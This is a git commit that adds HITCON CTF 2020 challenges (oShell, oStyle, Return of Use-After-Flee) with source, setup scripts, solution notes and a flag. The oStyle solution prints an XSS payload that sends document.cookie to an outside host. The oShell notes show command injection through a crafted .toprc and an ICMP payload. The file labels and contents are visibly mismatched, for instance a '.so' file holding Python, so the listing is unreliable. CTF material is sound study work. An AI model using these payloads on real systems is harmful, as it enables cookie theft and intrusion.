add hitcon ctf 2020

Author: orangetw

README.md

@@ -24,6 +24,11 @@ And you can find me via:
 
 ## **Table of Content**
 
+* [HITCON 2020](#oShell)
+    * [oShell](#oShell)
+    * [oStyle](#oStyle)
+    * [Return of Use-After-Flee](#return-of-use-after-flee)
+
 * [HITCON 2019 Quals](#virtual-public-network)
     * [Virtual Public Network](#virtual-public-network)
     * [Bounty Pl33z](#bounty-pl33z)
@@ -72,6 +77,83 @@ And you can find me via:
 
 <br>
 
+## **oShell**
+  
+Difficulty: **★★**  
+Solved: **21 / 1281**  
+Tag:   **BlackBox**, **Shell** ,**Command Injection**  
+
+#### Source Code
+
+* [Source](hitcon-ctf-2020/oShell/)  
+
+#### Solution
+
+1. Leveraging `strace` in `htop` to read enable secret.
+2. Writing `/home/oShell/.toprc` with `tcpdump -w`
+3. Abusing `top` inspect feature to run arbitrary commands
+
+
+#### Write Ups
+
+* [Writeup from team FrenchRoomba](https://github.com/FrenchRoomba/ctf-writeup-HITCON-CTF-2020/tree/master/oShell)  
+
+
+## **oStyle**
+  
+Difficulty: **★★☆**  
+Solved: **10 / 1281**  
+Tag:   **XSS**
+
+#### Source Code
+
+* [Source](hitcon-ctf-2020/oStyle/)  
+
+#### Solution
+
+* The default Apache installation enabled `mod_negotiation`, which allows `.var` mapping and you can specify arbitrary content-type there.
+
+**test.var**
+```
+Content-language: en
+Content-type: text/html
+Body:----foo----
+
+<script>
+fetch('http://orange.tw/?' + escape(document.cookie))
+</script>
+
+----foo----
+
+```
+
+
+#### Write Ups
+
+* TBD
+
+
+## **Return of Use-After-Flee**
+  
+Difficulty: **★★★★★**  
+Solved: **0 / 1281**  
+Tag: **WhiteBox**, **PHP**, **UAF**, **PWN**  
+
+#### Source Code
+
+* [Source](hitcon-ctf-2020/return-of-use-after-flee/)  
+
+#### Solution
+
+* Exploiting `CVE-2015-0273` to pop the shell without known binaries. More detail will be published in [my blog](http://blog.orange.tw/) soon.
+
+
+#### Write Ups
+
+* TBD
+
+
+
 ## **Virtual Public Network**
 
 Difficulty: **★☆**  

hitcon-ctf-2020/Return-of-Use-After-Flee/index.php

@@ -0,0 +1,35 @@
+<?php
+    error_reporting(0);
+    $fid = 1337;
+
+    function get($name) {
+        if (isset($_COOKIE[$name])) {
+            return $_COOKIE[$name];
+        }
+        return false;
+    }
+
+    function set($name, $value = null) {
+        if (empty($name)) return false;
+        setcookie($name, $value);
+        return true;
+    }
+
+    function getVisitor() {
+        $sign = get('visitor');
+        if (empty($sign)) return false; 
+        $sign = base64_decode($sign);
+        return $sign;
+    }
+
+    function signVisitor($extension = array()) {
+        $sign = base64_encode(serialize($extension));
+        set('visitor', $sign);
+    }
+
+    $vistor = getVisitor();
+    if (!$vistor) highlight_file(__FILE__) && die();
+    $ext = unserialize($vistor);
+
+    if (isset($ext['currentFid']) && $ext['currentFid'] == $fid) die('GG');
+    signVisitor(array('currentFid'=>$fid, 'beforeFid'=>$ext['currentFid']));

hitcon-ctf-2020/Return-of-Use-After-Flee/install.txt

@@ -0,0 +1,6 @@
+# CentOS 5.7
+# Apache 2.2.22
+./configure --prefix=/usr/local/apache2 --sysconfdir=/etc/httpd --enable-rewrite=static --with-mpm=worker --enable-so --enable-proxy --enable-proxy-http --enable-deflate --enable-headers --enable-expires --with-included-apr
+
+# PHP 5.3.27
+./configure --prefix=/usr/local/apache2/php  --with-apxs2=/usr/local/apache2/bin/apxs --with-config-file-path=/usr/local/apache2/php --enable-mysqlnd

hitcon-ctf-2020/Return-of-Use-After-Flee/libphp5.so

@@ -0,0 +1,99 @@
+#!/usr/bin/python -u
+import os, sys
+import pty
+import uuid
+import requests
+from time import sleep
+from tempfile import mkstemp
+from subprocess import check_output
+
+COLORS = {
+    'header': '\033[95m', 
+    'blue': '\033[94m', 
+    'cyan': '\033[96m', 
+    'green': '\033[92m', 
+    'warning': '\033[93m', 
+    'fail': '\033[91m', 
+    'endc': '\033[0m', 
+    'bold': '\033[1m', 
+    'underline': '\033[4m', 
+    'blink': '\033[5m', 
+}
+
+def check_token(token):
+    def _is_valid_uuid(s):
+        try:
+            return uuid.UUID(s) is not None
+        except:
+            return False
+
+    if _is_valid_uuid(token):
+        r = requests.get('https://ctf2020.hitcon.org/team/token_auth?token=%s' % token)
+        return r.json().get('id')
+    # else:
+    #     if token == 'orange':
+    #         return True
+
+def my_exec(cmds):
+    return check_output(cmds)
+
+def _color(s, color=''):
+    code = COLORS.get(color)
+    if code:
+        return COLORS['bold'] + code + s + COLORS['endc'] + COLORS['endc']
+    else:
+        return s
+
+if __name__ == '__main__':
+    token = raw_input(_color('Team token: ', 'bold')).strip()
+    if not token or not check_token(token):
+        print(_color('Bad token. Bye!\n', 'warning'))
+        exit(-1)
+
+    name = 'team-%s' % token
+    cmds = [
+        'sudo', 
+        'docker', 'ps', '-q', 
+        '-f', 'name=%s' % name
+    ]
+    container_id = my_exec(cmds)
+    if container_id:
+        print(_color('[*] Connecting to initialized instance...\n', 'bold'))
+    else:
+        print(_color('[*] Initializing instance...\n', 'bold'))
+
+        _, tmp_name = mkstemp(prefix='%s_'%name, dir='/home/orange/tmp/')
+        with open(tmp_name, 'wb+') as fp:
+            fp.write('this-is-secret-' + os.urandom(8).encode('hex'))
+
+        os.chmod(tmp_name, 0o444)
+        cmds = [
+            'sudo', 
+            'docker', 'rm', '-f', name
+        ]
+        try:
+            with open(os.devnull, 'w') as devnull:
+                check_output(cmds, stderr=devnull)
+        except:
+            pass
+
+        cmds = [
+            'sudo', 
+            'docker', 'run', '-d', '--rm', 
+            '--env', 'LOG_HOST=172.17.0.1', 
+            '-v', '%s:/enable.secret' % tmp_name, 
+            '--name', name, 
+            'oshell'
+        ]
+        my_exec(cmds)
+        sleep(2)
+
+    cmds = [
+        'sudo', 
+        'docker', 'exec', '-ti', 
+        '-u', 'oShell', 
+        name, 
+        'python', '/oShell.py', 'tty'
+    ]
+
+    pty.spawn(cmds)

hitcon-ctf-2020/oShell/oShell-wrapper.py

@@ -0,0 +1,27 @@
+FROM alpine:3.7
+MAINTAINER Orange Tsai<orange@chroot.org>
+
+# add user
+RUN adduser oShell -h / -s /bin/nologin -D -u 1337 -h /home/oShell/
+
+# copy file
+ADD oShell.py /
+ADD readflag /
+ADD flag /
+ADD tcpdump /bin/
+
+
+# cmd
+RUN apk update
+RUN apk add htop strace procps libcap python2
+
+# permission
+RUN chmod 400 /flag
+RUN chmod +s /readflag
+RUN chmod 774 /oShell.py
+
+# setup
+RUN setcap cap_net_raw=eip /bin/tcpdump cap_net_raw=eip /bin/busybox
+RUN rm -rf /usr/bin/top && sed -i 's/UNKNOWN/3.3.12 /g' /bin/top
+
+CMD ["sleep", "300"]

hitcon-ctf-2020/oShell/oShell/Dockerfile

@@ -0,0 +1,7 @@
+#!/bin/bash
+
+docker rm -f `docker ps -a -q`
+docker rmi -f oshell
+
+docker build . -t oshell
+# docker run -ti --name team-$1 -u oShell oshell

hitcon-ctf-2020/oShell/oShell/build.sh

@@ -0,0 +1,11 @@
+enable
+ping 
+tcpdump -w /home/oShell/.toprc icmp
+
+ping -c 1 13.115.220.111
+
+# https://github.com/PixelsCamp/ping-responder
+# echo net.ipv4.icmp_echo_ignore_all=1 | sudo tee /etc/sysctl.d/z01-disable_echo_reply.conf >/dev/null
+# systemctl restart systemd-sysctl
+echo -ne '\n\npipe\tOpen Files\ttouch /tmp/eeeeeeeeeeee\n\n' > payload
+python3 oshell-icmp.py -v -z -f payload

hitcon-ctf-2020/oShell/oShell/exp.txt

@@ -0,0 +1 @@
+HITCON{A! AAAAAAAAAAAA! SHAR~K!!!}